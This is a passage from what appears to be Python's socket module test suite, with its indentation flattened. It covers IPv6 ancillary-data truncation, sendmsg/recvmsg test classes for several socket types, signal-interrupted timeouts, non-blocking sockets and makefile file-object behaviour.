self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
    @testSecondCmsgTruncInData.client_skip
    def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: None)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
self.addCleanup(self.setAlarm, 0)
# Timeout for socket operations
timeout = 4.0
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises socket.error with an
# errno of EINTR when interrupted by a signal.
self.setAlarm(self.alarm_time)
with self.assertRaises(socket.error) as cm:
func(*args, **kwargs)
self.assertNotIsInstance(cm.exception, socket.timeout)
self.assertEqual(cm.exception.errno, errno.EINTR)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
@unittest.skipUnless(thread, 'Threading required for this test.')
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# socket.error with an errno of EINTR when interrupted by a
# signal.
with self.assertRaises(socket.error) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
self.assertNotIsInstance(cm.exception, socket.timeout)
self.assertEqual(cm.exception.errno, errno.EINTR)
# Issue #12958: The following tests have problems on Mac OS X
@support.anticipate_failure(sys.platform == "darwin")
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.anticipate_failure(sys.platform == "darwin")
def testInterruptedSendtoTimeout(self):
        # Pass an actual address here because Python's wrapper for
        # sendto() doesn't allow passing a zero-length one; POSIX
        # requires the address to be ignored anyway since the socket
        # is connection-mode.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.anticipate_failure(sys.platform == "darwin")
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
@unittest.skipUnless(thread, 'Threading required for this test.')
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
start = time.time()
try:
self.serv.accept()
except socket.error:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
# Issue 15989
if _testcapi.UINT_MAX < _testcapi.ULONG_MAX:
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
def _testSetBlocking(self):
pass
if hasattr(socket, "SOCK_NONBLOCK"):
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.port = support.bind_port(self.serv)
self.serv.listen(1)
# actual testing
start = time.time()
try:
self.serv.accept()
except socket.error:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except socket.error:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except socket.error:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(IOError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(socket.error, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class FileObjectInterruptedTestCase(unittest.TestCase):
"""Test that the file object correctly handles EINTR internally."""
class MockSocket(object):
def __init__(self, recv_funcs=()):
# A generator that returns callables that we'll call for each
# call to recv().
self._recv_step = iter(recv_funcs)
def recv_into(self, buffer):
data = next(self._recv_step)()
assert len(buffer) >= len(data)
buffer[:len(data)] = data
return len(data)
def _decref_socketios(self):
pass
def _textiowrap_for_test(self, buffering=-1):
raw = socket.SocketIO(self, "r")
if buffering < 0:
buffering = io.DEFAULT_BUFFER_SIZE
if buffering == 0:
return raw
buffer = io.BufferedReader(raw, buffering)
text = io.TextIOWrapper(buffer, None, None)
text.mode = "rb"
return text
@staticmethod
def _raise_eintr():
raise socket.error(errno.EINTR, "interrupted")
def _textiowrap_mock_socket(self, mock, buffering=-1):
raw = socket.SocketIO(mock, "r")
if buffering < 0:
buffering = io.DEFAULT_BUFFER_SIZE
if buffering == 0:
return raw
buffer = io.BufferedReader(raw, buffering)
text = io.TextIOWrapper(buffer, None, None)
text.mode = "rb"
return text
def _test_readline(self, size=-1, buffering=-1):
mock_sock = self.MockSocket(recv_funcs=[
lambda : b"This is the first line\nAnd the sec",
self._raise_eintr,
lambda : b"ond line is here\n",
lambda : b"",
lambda : b"", # XXX(gps): io library does an extra EOF read
])
fo = mock_sock._textiowrap_for_test(buffering=buffering)
self.assertEqual(fo.readline(size), "This is the first line\n")
self.assertEqual(fo.readline(size), "And the second line is here\n")
def _test_read(self, size=-1, buffering=-1):
mock_sock = self.MockSocket(recv_funcs=[
lambda : b"This is the first line\nAnd the sec",
self._raise_eintr,
lambda : b"ond line is here\n",
lambda : b"",
lambda : b"", # XXX(gps): io library does an extra EOF read
])
expecting = (b"This is the first line\n"
b"And the second line is here\n")
fo = mock_sock._textiowrap_for_test(buffering=buffering)
if buffering == 0:
data = b''
else:
data = ''
expecting = expecting.decode('utf-8')
while len(data) != len(expecting):
part = fo.read(size)
if not part:
break
data += part
self.assertEqual(data, expecting)
def test_default(self):
self._test_readline()
self._test_readline(size=100)
self._test_read()
self._test_read(size=100)
def test_with_1k_buffer(self):
self._test_readline(buffering=1024)
self._test_readline(size=100, buffering=1024)
self._test_read(buffering=1024)
self._test_read(size=100, buffering=1024)
def _test_readline_no_buffer(self, size=-1):
mock_sock = self.MockSocket(recv_funcs=[
lambda : b"a",
lambda : b"\n",
lambda : b"B",
self._raise_eintr,
lambda : b"b",
lambda : b"",
])
fo = mock_sock._textiowrap_for_test(buffering=0)
self.assertEqual(fo.readline(size), b"a\n")
self.assertEqual(fo.readline(size), b"Bb")
def test_no_buffer(self):
self._test_readline_no_buffer()
self._test_readline_no_buffer(size=4)
self._test_read(buffering=0)
self._test_read(size=100, buffering=0)
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(socket.error, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
            # Data has not arrived yet (can happen under Windows); wait a bit
time.sleep(0.5)
